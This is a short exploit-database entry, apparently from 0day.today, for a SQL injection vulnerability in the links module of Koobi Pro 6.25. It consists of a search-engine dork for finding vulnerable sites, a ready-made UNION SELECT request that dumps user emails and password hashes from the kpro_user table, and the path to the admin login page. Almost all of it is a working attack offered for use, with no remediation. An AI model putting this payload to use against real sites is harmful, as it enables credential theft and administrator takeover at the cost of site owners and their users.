id: 2852
date: 04/07/2008
title: Koobi Pro 6.25 links Remote SQL Injection Vulnerability
author: S@BUN
cves: 

=======================================================
Koobi Pro 6.25 links Remote SQL Injection Vulnerability
=======================================================



##########################################
#
# Koobi Pro 6.25 links(categ)
#
all version Koobi
#
###########################################
#
# DORK 1 : allinurl: "index.php?showlink"links
#
###########################################
EXPLOiT :

index.php?showlink=S@BUN&fid=S@BUN8&p=links&area=1&categ=-1+union+select+0,concat(email,0x3a,pass),2+from+kpro_user
admin login=admin/login.php

###########################################



#  0day.today [2023-03-25]  #